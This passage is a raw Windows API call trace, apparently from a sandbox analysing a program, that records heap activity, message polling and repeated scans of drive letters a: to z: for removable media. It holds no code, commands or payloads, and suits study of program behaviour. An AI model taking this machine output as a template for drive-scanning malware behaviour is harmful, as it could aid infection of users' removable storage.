[0207.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0207.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0207.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0207.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0207.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0207.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0207.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0207.953] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0207.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0207.953] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0207.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0207.953] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0207.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0207.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0207.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0207.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0207.954] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0207.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0207.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0207.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0207.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0207.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0207.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0207.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0207.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0207.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0207.955] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0207.955] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0207.955] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0207.955] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0207.955] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0207.956] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0207.956] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0207.956] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0207.956] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0207.956] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0207.957] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0207.957] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0207.957] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0207.957] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0207.957] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0207.957] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0207.958] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0207.958] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0207.958] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0207.958] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0207.958] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0207.959] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0207.959] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0207.959] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0207.960] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0207.960] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0207.960] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0207.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0207.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0207.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0207.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0207.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0207.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0207.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0207.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0207.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0207.961] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0207.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0207.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0207.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0207.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0207.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0207.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0207.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0207.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0207.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0207.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0207.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0207.962] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0207.962] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0207.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0207.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0207.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0207.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0207.963] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0207.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0207.963] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0207.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0207.963] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0207.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0207.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0207.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0207.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0207.963] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0207.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0207.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0207.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0207.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0207.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0207.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0207.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0207.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0207.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0207.964] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0207.964] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0207.964] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0207.964] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0207.964] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0207.965] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0207.965] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0207.965] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0207.965] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0207.965] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0207.966] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0207.966] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0207.966] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0207.966] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0207.966] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0207.967] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0207.967] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0207.967] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0207.967] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0207.967] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0207.968] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0207.968] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0207.968] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0207.968] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0207.968] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0207.969] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0207.969] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0207.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0207.969] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0207.970] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.970] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.970] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.970] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.970] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0207.970] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.970] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0207.970] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0207.970] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0207.971] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0207.971] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0207.971] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0207.971] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0207.971] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0207.972] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0207.972] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0207.972] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0207.972] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0207.972] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0207.973] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0207.973] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0207.973] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0207.973] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0207.973] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0207.974] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0207.974] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0207.974] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0207.974] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0207.974] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0207.975] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0207.975] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0207.975] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0207.975] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0207.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0207.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.976] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.976] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.976] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0207.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.976] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0207.976] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0207.977] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0207.977] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0207.977] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0207.977] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0207.977] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0207.977] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0207.978] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0207.978] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0207.978] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0207.978] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0207.978] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0207.979] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0207.979] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0207.979] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0207.979] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0207.980] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0207.980] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0207.980] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0207.980] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0207.980] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0207.981] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0207.981] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0207.981] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0207.982] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0207.982] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0207.982] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0207.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0207.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0207.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0207.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0207.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0207.983] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0207.983] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0207.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0207.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0207.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0207.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0207.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0207.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0207.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.983] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0207.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.983] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0207.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0207.984] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0207.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0207.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0207.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0207.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0207.984] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0207.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0207.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0207.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0207.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0207.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0207.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0207.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0207.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0207.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0207.985] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0207.985] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0207.985] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0207.985] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0207.985] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0207.985] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0207.986] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 